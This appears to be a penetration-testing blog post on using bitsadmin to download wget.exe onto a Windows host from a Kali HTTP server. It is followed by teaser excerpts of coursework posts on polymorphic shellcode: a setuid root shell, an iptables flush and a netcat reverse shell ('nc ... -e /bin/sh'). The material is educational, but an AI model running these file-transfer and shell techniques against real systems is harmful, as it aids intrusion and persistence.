Use bitsadmin For File Transfer

On Kali:
Set up an HTTP listener someplace where the wget.exe file can be fetched:
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80

On Windows:
Create or change to a directory where your current user has permissions to create files:
mkdir \temp
cd \temp

Get the wget.exe file:
set HOSTIP=10.0.0.22
cmd /c "bitsadmin /transfer wcb /priority foreground http://%HOSTIP%/wget.exe %cd%\wget.exe"

Tested and working on default installs of:
Windows Vista 32 bit
Windows vista 64 bit
Windows server 2008 standard SP1 32 bit
Windows 7 SP1 32 bit
Windows 7 SP1 64 bit
Windows 8 32 bit
Windows 8 64 bit
Windows server 2012 64 bit

Did not work on Windows versions prior to Vista and is deprecated and not working on Windows 10.

Comments

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain] Flush ...

PolyNetCatRevShell1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-823.php Original Size: 109 bytes My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm Published : https://www.exploit-db.com/exploits/41510/ My version: Number of bytes = 106 Number of nulls = 0 PolyNetCatRevShell1434.nasm Intro The PolyNetCatRevShell1434 does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh Polymorphic This is a polymorphic version of the original author's code which does basically the same thing. I rewrote the ...

Personal Bits

Search This Blog